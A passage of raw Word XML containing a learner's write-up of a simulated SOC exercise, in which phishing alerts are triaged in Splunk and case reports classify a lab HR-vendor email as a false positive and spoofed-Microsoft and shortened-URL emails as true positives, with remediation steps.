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02192" w14:textId="636B0564" w:rsidR="00462050" w:rsidRDefault="00C2357A">
      <w:r>
        <w:t>SOC Simulation:-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480C75D6" w14:textId="124302B7" w:rsidR="00C2357A" w:rsidRDefault="00C2357A">
      <w:r>
        <w:t>SIEM used – Splunk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7BDEBF" w14:textId="661831B1" w:rsidR="00C2357A" w:rsidRDefault="00C2357A">
      <w:r w:rsidRPr="00C2357A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49372DBD" wp14:editId="17B07A14">
            <wp:extent cx="5731510" cy="2893060"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="3567175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717508" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2893060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="31013B22" w14:textId="1D5BD957" w:rsidR="00C2357A" w:rsidRDefault="00C2357A">
      <w:r>
        <w:t>This were the details of the first alert that came in. So first step was to take ownership of the alert and either tag it as a false positive(not genuine) or a true positive( may be actually harmful)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA40489" w14:textId="41DB6CC0" w:rsidR="00C2357A" w:rsidRDefault="00C2357A">
      <w:r>
        <w:t xml:space="preserve">So we use Splunk as the SIEM tool to investigate previous cases in which the same email may have been blocked/not blocked or if the domain of the link in the alert was accessed/blocked by any clients. Upon searching through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>splunk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for the domain name of the link:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC95994" w14:textId="7E75FD76" w:rsidR="00C2357A" w:rsidRDefault="00C2357A">
      <w:r w:rsidRPr="00C2357A">
        <w:t>index=* "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C2357A">
        <w:t>hrconnex.thm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C2357A">
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD56549" w14:textId="77777777" w:rsidR="00C2357A" w:rsidRDefault="00C2357A"/>
    <w:p w14:paraId="4A7C79BE" w14:textId="451E5F02" w:rsidR="00C2357A" w:rsidRDefault="00C2357A">
      <w:r>
        <w:t>The alerts were filtered down to the following 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7577869C" w14:textId="74D59FA1" w:rsidR="00C2357A" w:rsidRDefault="00C2357A">
      <w:r>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C2357A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4259E6C4" wp14:editId="04792AFC">
            <wp:extent cx="5731510" cy="1813560"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="14780130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8013023" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1813560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BD6F7F" w14:textId="4064D1AE" w:rsidR="00C2357A" w:rsidRDefault="00C2357A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00C2357A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76CCD39A" wp14:editId="6CF3E5D7">
            <wp:extent cx="5731510" cy="1798320"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="10252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22648" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1798320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="276E6D22" w14:textId="5678AEEF" w:rsidR="00C2357A" w:rsidRDefault="00C2357A">
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00C2357A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EDBF365" wp14:editId="010E8152">
            <wp:extent cx="5731510" cy="1821180"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="17004303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0430321" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1821180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F764A1A" w14:textId="77777777" w:rsidR="00C2357A" w:rsidRDefault="00C2357A"/>
    <w:p w14:paraId="7CF6391F" w14:textId="57B34EE0" w:rsidR="00C2357A" w:rsidRDefault="00C2357A">
      <w:r>
        <w:t>From the third attempt it becomes clear that the link and emails were genuinely sent by an employee/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>collegue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and were legitimate. So can be flagged as a false positive(not risky)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E7B808" w14:textId="44227DAA" w:rsidR="00C2357A" w:rsidRDefault="00C2357A">
      <w:r>
        <w:t>Case Report -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22058FFC" w14:textId="77777777" w:rsidR="00C2357A" w:rsidRPr="00C2357A" w:rsidRDefault="00C2357A" w:rsidP="00C2357A">
      <w:r w:rsidRPr="00C2357A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Time of Activity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C2357A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C2357A">
        <w:br/>
        <w:t>Nov 22nd 2025 at 18:51</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A716A06" w14:textId="77777777" w:rsidR="00C2357A" w:rsidRPr="00C2357A" w:rsidRDefault="00C2357A" w:rsidP="00C2357A">
      <w:r w:rsidRPr="00C2357A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>List of Related Entities:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C2357A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFD39D9" w14:textId="77777777" w:rsidR="00C2357A" w:rsidRPr="00C2357A" w:rsidRDefault="00C2357A" w:rsidP="00C2357A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C2357A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recipient:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C2357A">
        <w:t xml:space="preserve"> j.garcia@thetrydaily.thm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA13996" w14:textId="77777777" w:rsidR="00C2357A" w:rsidRPr="00C2357A" w:rsidRDefault="00C2357A" w:rsidP="00C2357A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C2357A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sender:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C2357A">
        <w:t xml:space="preserve"> onboarding@hrconnex.thm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102AFDCC" w14:textId="77777777" w:rsidR="00C2357A" w:rsidRPr="00C2357A" w:rsidRDefault="00C2357A" w:rsidP="00C2357A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C2357A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Subject:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C2357A">
        <w:t xml:space="preserve"> "Action Required: Finalize Your Onboarding Profile"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C572777" w14:textId="77777777" w:rsidR="00C2357A" w:rsidRPr="00C2357A" w:rsidRDefault="00C2357A" w:rsidP="00C2357A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C2357A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Suspicious URL:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C2357A">
        <w:t xml:space="preserve"> https://hrconnex.thm/onboarding/15400654060/j.garcia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1691EE74" w14:textId="77777777" w:rsidR="00C2357A" w:rsidRPr="00C2357A" w:rsidRDefault="00C2357A" w:rsidP="00C2357A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C2357A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Domain:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C2357A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C2357A">
        <w:t>hrconnex.thm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="77759308" w14:textId="77777777" w:rsidR="00C2357A" w:rsidRPr="00C2357A" w:rsidRDefault="00C2357A" w:rsidP="00C2357A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C2357A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attachment:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C2357A">
        <w:t xml:space="preserve"> None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74969144" w14:textId="77777777" w:rsidR="00C2357A" w:rsidRPr="00C2357A" w:rsidRDefault="00C2357A" w:rsidP="00C2357A">
      <w:r w:rsidRPr="00C2357A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reason for Classifying as False Positive:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C2357A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4FC52E" w14:textId="77777777" w:rsidR="00C2357A" w:rsidRPr="00C2357A" w:rsidRDefault="00C2357A" w:rsidP="00C2357A">
      <w:r w:rsidRPr="00C2357A">
        <w:t xml:space="preserve">The email security tool flagged the message because it contains an external link from an unfamiliar domain. However, internal HR communications confirm that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C2357A">
        <w:t>hrconnex.thm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C2357A">
        <w:t xml:space="preserve"> is a newly onboarded third-party HR vendor, and the onboarding email was expected. No malicious activity was detected, and the domain is legitimate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF5CF5E" w14:textId="6D6C0823" w:rsidR="00C2357A" w:rsidRDefault="00C2357A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Next:-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4657F54E" w14:textId="3AF8BAA2" w:rsidR="00C2357A" w:rsidRDefault="005F0D27">
      <w:r w:rsidRPr="005F0D27">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="731C9F0E" wp14:editId="4ECCE561">
            <wp:extent cx="5731510" cy="2520315"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="7879101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910189" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2520315"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCFBD84" w14:textId="75EC30E7" w:rsidR="005F0D27" w:rsidRDefault="005F0D27">
      <w:r>
        <w:t>Now this is a clear case of domain spoofing. Going through SIEM logs, to further investigate the same domain, following logs came up:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C4CC3B" w14:textId="62DBE16D" w:rsidR="005F0D27" w:rsidRDefault="005F0D27">
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B686F9" w14:textId="6A0CDBFE" w:rsidR="005F0D27" w:rsidRDefault="005F0D27">
      <w:r w:rsidRPr="005F0D27">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A608721" wp14:editId="342CA706">
            <wp:extent cx="5639289" cy="2949196"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="352061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061547" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5639289" cy="2949196"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0053D717" w14:textId="2B6F2C61" w:rsidR="005F0D27" w:rsidRDefault="005F0D27">
      <w:r>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DFD75A" w14:textId="6F0031E1" w:rsidR="005F0D27" w:rsidRDefault="005F0D27">
      <w:r w:rsidRPr="005F0D27">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="758681F1" wp14:editId="15D67DEC">
            <wp:extent cx="5731510" cy="1783080"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="611844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844200" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1783080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="620CCC6A" w14:textId="38E19DD6" w:rsidR="005F0D27" w:rsidRDefault="005F0D27">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>So we can see that the victim definitely clicked on the link that was sent to his email. The IP of the domain was external/outside the organisation so that also raises suspicions. It also had an urgency to it which may have tricked the user into clicking the link. As the traffic from this link was not blocked and the user connected to the URL successfully, it is necessary to further escalate and investigate this alert. So it is a true positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006CC070" w14:textId="23E4CBD9" w:rsidR="005F0D27" w:rsidRDefault="005F0D27">
      <w:r>
        <w:t xml:space="preserve">Case report – </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DF857F" w14:textId="77777777" w:rsidR="005F0D27" w:rsidRPr="005F0D27" w:rsidRDefault="005F0D27" w:rsidP="005F0D27">
      <w:r w:rsidRPr="005F0D27">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Time of activity:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0D27">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44112EB4" w14:textId="77777777" w:rsidR="005F0D27" w:rsidRPr="005F0D27" w:rsidRDefault="005F0D27" w:rsidP="005F0D27">
      <w:r w:rsidRPr="005F0D27">
        <w:t>Nov 22nd 2025 at 18:54</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623999DD" w14:textId="77777777" w:rsidR="005F0D27" w:rsidRPr="005F0D27" w:rsidRDefault="005F0D27" w:rsidP="005F0D27">
      <w:r w:rsidRPr="005F0D27">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>List of Affected Entities:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0D27">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D09165" w14:textId="77777777" w:rsidR="005F0D27" w:rsidRPr="005F0D27" w:rsidRDefault="005F0D27" w:rsidP="005F0D27">
      <w:r w:rsidRPr="005F0D27">
        <w:t> c.allen@thetrydaily.thm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A66AEEE" w14:textId="77777777" w:rsidR="005F0D27" w:rsidRPr="005F0D27" w:rsidRDefault="005F0D27" w:rsidP="005F0D27">
      <w:r w:rsidRPr="005F0D27">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reason for Classifying as True Positive:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0D27">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70518EC4" w14:textId="77777777" w:rsidR="005F0D27" w:rsidRPr="005F0D27" w:rsidRDefault="005F0D27" w:rsidP="005F0D27">
      <w:r w:rsidRPr="005F0D27">
        <w:t xml:space="preserve">Domain name is clearly spoofed(Instead of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F0D27">
        <w:t>microsoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F0D27">
        <w:t>, m1crosoftsupport) has been used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DED8C9" w14:textId="77777777" w:rsidR="005F0D27" w:rsidRPr="005F0D27" w:rsidRDefault="005F0D27" w:rsidP="005F0D27">
      <w:r w:rsidRPr="005F0D27">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reason for Escalating the Alert:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0D27">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172F59EF" w14:textId="77777777" w:rsidR="005F0D27" w:rsidRPr="005F0D27" w:rsidRDefault="005F0D27" w:rsidP="005F0D27">
      <w:r w:rsidRPr="005F0D27">
        <w:t>The alert is escalated because the recipient (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F0D27">
        <w:t>c.allen@thetrydaily.thm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F0D27">
        <w:t xml:space="preserve">) clicked a link to a suspicious domain (m1crosoftsupport.co) identified as a Microsoft account phishing attempt. Firewall logs confirm the connection was allowed, indicating potential exposure of credentials or compromise of the endpoint. Escalation is required for </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E99E12C" w14:textId="77777777" w:rsidR="005F0D27" w:rsidRPr="005F0D27" w:rsidRDefault="005F0D27" w:rsidP="005F0D27">
      <w:r w:rsidRPr="005F0D27">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommended Remediation Actions:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0D27">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40600311" w14:textId="77777777" w:rsidR="005F0D27" w:rsidRPr="005F0D27" w:rsidRDefault="005F0D27" w:rsidP="005F0D27">
      <w:r w:rsidRPr="005F0D27">
        <w:t>Password reset, endpoint review, blocking the domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6271DA" w14:textId="77777777" w:rsidR="005F0D27" w:rsidRPr="005F0D27" w:rsidRDefault="005F0D27" w:rsidP="005F0D27">
      <w:r w:rsidRPr="005F0D27">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>List of Attack Indicators:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0D27">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B68765" w14:textId="77777777" w:rsidR="005F0D27" w:rsidRPr="005F0D27" w:rsidRDefault="005F0D27" w:rsidP="005F0D27">
      <w:r w:rsidRPr="005F0D27">
        <w:t>Spoofed domain, external IP, traffic was allowed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1721BB63" w14:textId="77777777" w:rsidR="005F0D27" w:rsidRDefault="005F0D27"/>
    <w:p w14:paraId="1B463ED5" w14:textId="0E5E197A" w:rsidR="005F0D27" w:rsidRDefault="00D73730">
      <w:r>
        <w:t>Next: -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7481253D" w14:textId="344B2C71" w:rsidR="00D73730" w:rsidRDefault="002B59F4">
      <w:r w:rsidRPr="002B59F4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42F4CA49" wp14:editId="6681736D">
            <wp:extent cx="5731510" cy="2148840"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="483326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3326482" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2148840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="290A4102" w14:textId="02337AAA" w:rsidR="002B59F4" w:rsidRDefault="002B59F4">
      <w:r>
        <w:t>Upon going through SIEM logs following 2 came up: -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C2F69C" w14:textId="497B997A" w:rsidR="002B59F4" w:rsidRDefault="002B59F4">
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFE821F" w14:textId="0A11067E" w:rsidR="002B59F4" w:rsidRDefault="002B59F4">
      <w:r w:rsidRPr="002B59F4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A32CF16" wp14:editId="7A5B0278">
            <wp:extent cx="5731510" cy="1350010"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="659117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9117252" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1350010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E07AB95" w14:textId="174E439B" w:rsidR="002B59F4" w:rsidRDefault="002B59F4">
      <w:r>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC85F42" w14:textId="3B1C66D8" w:rsidR="002B59F4" w:rsidRDefault="002B59F4">
      <w:r w:rsidRPr="002B59F4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BA25093" wp14:editId="25A4DE54">
            <wp:extent cx="5731510" cy="1368425"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="1699674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9674037" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1368425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4855A7" w14:textId="0ECD2217" w:rsidR="002B59F4" w:rsidRDefault="002B59F4">
      <w:r>
        <w:t xml:space="preserve">Second log shows us that the user actually clicked on the link and  the link was blocked . So this means that the attempt was a phishing attempt as the website was maliciously flagged by the organization. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463E8E34" w14:textId="2B7E9615" w:rsidR="002B59F4" w:rsidRDefault="002B59F4">
      <w:r>
        <w:t>Also other indicators such as – shortened URL, a tone of urgency in the email, unreliable email domain name also indicate a phishing attempt. So we will be flagging this as a true positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51720BDD" w14:textId="7FD261AB" w:rsidR="002B59F4" w:rsidRDefault="002B59F4">
      <w:r>
        <w:t>Case Report –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F42DEF" w14:textId="77777777" w:rsidR="002B59F4" w:rsidRPr="002B59F4" w:rsidRDefault="002B59F4" w:rsidP="002B59F4">
      <w:r w:rsidRPr="002B59F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Time of activity:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B59F4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A931B7D" w14:textId="77777777" w:rsidR="002B59F4" w:rsidRPr="002B59F4" w:rsidRDefault="002B59F4" w:rsidP="002B59F4">
      <w:r w:rsidRPr="002B59F4">
        <w:t>Nov 22nd 2025 at 18:52</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7892794D" w14:textId="77777777" w:rsidR="002B59F4" w:rsidRPr="002B59F4" w:rsidRDefault="002B59F4" w:rsidP="002B59F4">
      <w:r w:rsidRPr="002B59F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>List of Affected Entities:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B59F4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
